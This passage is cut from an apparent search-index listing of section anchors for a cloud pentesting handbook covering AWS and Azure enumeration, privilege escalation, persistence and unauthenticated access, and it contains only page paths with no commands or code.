enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#aws---ses-enum","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#smtp-user","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#aws---sns-enum","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#sns","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#difference-with-sqs","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#aws---sqs-enum","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#sqs","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#aws---s3-athena--glacier-enum","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#bucket-versioning-and-mfa-based-delete","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-access-logs","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-presigned-urls","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-encryption-mechanisms","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#dual-stack","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-post-exploitation","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#other-s3-vulns","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-http-cache-poisoning-issue","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#amazon-athena","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#aws---step-functions-enum","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#standard-vs-express-workflows","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#states","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#task","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#choice","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#failsucceed","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#pass","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#wait","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#parallel","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#map","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#versions-and-aliases","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#iam-roles-for-state-machines","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#aws---sts-enum","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#sts","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#assume-role-impersonation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#aws---other-services-enum","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#directconnect","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#support","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws---unauthenticated-enum--access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-credentials-leaks","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-unauthenticated-enum--access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#cross-account-attacks","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#tools","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#aws---accounts-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#account-ids","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#brute-force","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#osint","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#marketplace","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#errors","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#aws---api-gateway-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#api-invoke-bypass","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#iam-policy-injection","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#get-account-id-from-public-api-gateway-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#aws---cloudfront-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#aws---cognito-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#unauthenticated-cognito","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#identity-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#user-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#pacu-modules-for-pentesting-and-enumeration","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#aws---codebuild-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#buildspecyml","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#self-hosted-github-actions-runners-in-aws-codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#aws---documentdb-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#aws---dynamodb-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#dynamo-db","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#aws---ec2-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#ec2--related-services","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#public-ports","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#public-amis--ebs-snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#enumerate-ec2-instances-with-public-ip","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#aws---ecr-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#ecr","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#public-registry-repositories-images","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#enumerate-private-repo","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#aws---ecs-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#publicly-accessible-security-group-or-load-balancer-for-ecs-services","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#aws---elastic-beanstalk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#web-vulnerability","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#insecure-security-group-rules","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#publicly-accessible-load-balancer","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#publicly-accessible-s3-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#enumerate-public-environments","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#aws---elasticsearch-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#aws---iam--sts-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#enumerate-roles--usernames-in-an-account","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#assume-role-brute-force","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#trust-policies-brute-force-cross-account-roles-and-users","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#privesc","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#third-party-oidc-federation","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws---identity-center--sso-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws-device-code-phishing","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#attack","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#phishing-the-unphisable-mfa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#automatic-tools","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#aws---iot-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#aws---kinesis-video-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#aws---lambda-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#public-function-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#get-account-id-from-public-lambda-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#aws---media-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#aws---mq-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#public-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#rabbitmq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#activemq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#aws---msk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#public-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#aws---rds-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#public-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#public-rds-snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#aws---redshift-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#aws---sqs-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#sqs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#check-permissions","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#aws---sns-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#sns","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#open-to-all","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#s3-public-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#finding-aws-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#find-the-region","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#enumerating-the-bucket","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#get-account-id-from-public-bucket","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#confirming-a-bucket-belongs-to-an-aws-account","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#used-emails-as-root-account-enumeration","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#references","pentesting-cloud/azure-security/index.html#azure-pentesting","pentesting-cloud/azure-security/index.html#basic-information","pentesting-cloud/azure-security/index.html#azure-pentesterred-team-methodology","pentesting-cloud/azure-security/index.html#external-enum--initial-access","pentesting-cloud/azure-security/index.html#azure--entra-id-tooling","pentesting-cloud/azure-security/index.html#bypass-access-policies","pentesting-cloud/azure-security/index.html#whoami","pentesting-cloud/azure-security/index.html#entra-id-enumeration--privesc","pentesting-cloud/azure-security/index.html#azure-enumeration","pentesting-cloud/azure-security/index.html#privilege-escalation-post-exploitation--persistence","pentesting-cloud/azure-security/az-basic-information/index.html#az---basic-information","pentesting-cloud/azure-security/az-basic-information/index.html#organization-hierarchy","pentesting-cloud/azure-security/az-basic-information/index.html#management-groups","pentesting-cloud/azure-security/az-basic-information/index.html#azure-subscriptions","pentesting-cloud/azure-security/az-basic-information/index.html#resource-groups","pentesting-cloud/azure-security/az-basic-information/index.html#azure-resource-ids","pentesting-cloud/azure-security/az-basic-information/index.html#azure-vs-entra-id-vs-azure-ad-domain-services","pentesting-cloud/azure-security/az-basic-information/index.html#azure","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-formerly-azure-active-directory","pentesting-cloud/azure-security/az-basic-information/index.html#entra-domain-services-formerly-azure-ad-ds","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-principals","pentesting-cloud/azure-security/az-basic-information/index.html#users","pentesting-cloud/azure-security/az-basic-information/index.html#members--guests-default-permissions","pentesting-cloud/azure-security/az-basic-information/index.html#users-default-configurable-permissions","pentesting-cloud/azure-security/az-basic-information/index.html#groups","pentesting-cloud/azure-security/az-basic-information/index.html#service-principals","pentesting-cloud/azure-security/az-basic-information/index.html#app-registrations","pentesting-cloud/azure-security/az-basic-information/index.html#default-consent-permissions","pentesting-cloud/azure-security/az-basic-information/index.html#managed-identity-metadata","pentesting-cloud/azure-security/az-basic-information/index.html#enterprise-applications","pentesting-cloud/azure-security/az-basic-information/index.html#administrative-units","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-roles--permissions","pentesting-cloud/azure-security/az-basic-information/index.html#azure-roles--permissions","pentesting-cloud/azure-security/az-basic-information/index.html#built-in-roles","pentesting-cloud/azure-security/az-basic-information/index.html#custom-roles","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-order","pentesting-cloud/azure-security/az-basic-information/index.html#global-administrator","pentesting-cloud/azure-security/az-basic-information/index.html#assignments-conditions--mfa","pentesting-cloud/azure-security/az-basic-information/index.html#deny-assignments","pentesting-cloud/azure-security/az-basic-information/index.html#azure-policies","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-inheritance","pentesting-cloud/azure-security/az-basic-information/index.html#azure-rbac-vs-abac","pentesting-cloud/azure-security/az-basic-information/index.html#references","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#az---tokens--public-applications","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#basic-information","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#oauth","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#authentication-tokens","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-aud","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-scopes-scp","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-refresh--access-token-example","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#other-access-token-fields","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#foci-tokens-privilege-escalation","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-different-scope","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-different-client-and-scopes","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#where-to-find-tokens","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#references","pentesting-cloud/azure-security/az-enumeration-tools.html#az---enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#install-powershell-in-linux","pentesting-cloud/azure-security/az-enumeration-tools.html#install-powershell-in-macos","pentesting-cloud/azure-security/az-enumeration-tools.html#main-enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#az-cli","pentesting-cloud/azure-security/az-enumeration-tools.html#az-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#microsoft-graph-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#azuread-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-recon--compliance-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#turbot-azure-plugins","pentesting-cloud/azure-security/az-enumeration-tools.html#prowler","pentesting-cloud/azure-security/az-enumeration-tools.html#monkey365","pentesting-cloud/azure-security/az-enumeration-tools.html#scoutsuite","pentesting-cloud/azure-security/az-enumeration-tools.html#azure-mg-sub-governance-reporting","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-post-exploitation-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#roadrecon","pentesting-cloud/azure-security/az-enumeration-tools.html#azurehound","pentesting-cloud/azure-security/az-enumeration-tools.html#microburst","pentesting-cloud/azure-security/az-enumeration-tools.html#powerzure","pentesting-cloud/azure-security/az-enumeration-tools.html#graphrunner","pentesting-cloud/azure-security/az-enumeration-tools.html#stormspotter","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#az---unauthenticated-enum--initial-entry","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-tenant","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#tenant-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#user-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#password-spraying--brute-force","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-services-using-domains","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#filesystem-credentials","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#references","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#az---container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#anonymous-pull-access","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#az---oauth-apps-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#oauth-app-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#app-consent-permissions","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#2-types-of-attacks","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#users-are-allowed-to-consent","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#application-admins","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#attack-flow-overview","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#example-attack","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#other-tools","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#post-exploitation","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#phishing-post-exploitation","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#entra-id-applications-admin","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#application-post-exploitation","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#references","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#az---storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#open-storage","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#sas-urls","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#az---vms-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#virtual-machines","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#exposed-vulnerable-service","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#public-gallery-images","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#public-extensions","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.html#az---device-code-authentication-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#az---password-spraying","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#password-spray","pentesting-cloud/azure-security/az-services/index.html#az---services","pentesting-cloud/azure-security/az-services/index.html#portals","pentesting-cloud/azure-security/az-services/index.html#raw-requests","pentesting-cloud/azure-security/az-services/index.html#list-of-services","pentesting-cloud/azure-security/az-services/az-azuread.html#az---entra-id-azuread--azure-iam","pentesting-cloud/azure-security/az-services/az-azuread.html#basic-information","pentesting-cloud/azure-security/az-services/az-azuread.html#enumeration","pentesting-cloud/azure-security/az-services/az-azuread.html#connection","pentesting-cloud/azure-security/az-services/az-azuread.html#tenants","pentesting-cloud/azure-security/az-services/az-azuread.html#users","pentesting-cloud/azure-security/az-services/az-azuread.html#mfa--conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#groups","pentesting-cloud/azure-security/az-services/az-azuread.html#service-principals","pentesting-cloud/azure-security/az-services/az-azuread.html#applications","pentesting-cloud/azure-security/az-services/az-azuread.html#managed-identities","pentesting-cloud/azure-security/az-services/az-azuread.html#azure-roles","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-id-roles","pentesting-cloud/azure-security/az-services/az-azuread.html#devices","pentesting-cloud/azure-security/az-services/az-azuread.html#administrative-units","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-id-privilege-escalation","pentesting-cloud/azure-security/az-services/az-azuread.html#azure-privilege-escalation","pentesting-cloud/azure-security/az-services/az-azuread.html#defensive-mechanisms","pentesting-cloud/azure-security/az-services/az-azuread.html#privileged-identity-management-pim","pentesting-cloud/azure-security/az-services/az-azuread.html#conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-identity-protection","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-password-protection","pentesting-cloud/azure-security/az-services/az-azuread.html#references","pentesting-cloud/azure-security/az-services/az-acr.html#az---acr","pentesting-cloud/azure-security/az-services/az-acr.html#basic-information","pentesting-cloud/azure-security/az-services/az-acr.html#enumerate","pentesting-cloud/azure-security/az-services/az-application-proxy.html#az---application-proxy","pentesting-cloud/azure-security/az-services/az-application-proxy.html#basic-information","pentesting-cloud/azure-security/az-services/az-application-proxy.html#enumeration","pentesting-cloud/azure-security/az-services/az-application-proxy.html#references","pentesting-cloud/azure-security/az-services/az-arm-templates.html#az---arm-templates--deployments","pentesting-cloud/azure-security/az-services/az-arm-templates.html#basic-information","pentesting-cloud/azure-security/az-services/az-arm-templates.html#history","pentesting-cloud/azure-security/az-services/az-arm-templates.html#search-sensitive-info","pentesting-cloud/azure-security/az-services/az-arm-templates.html#references","pentesting-cloud/azure-security/az-servi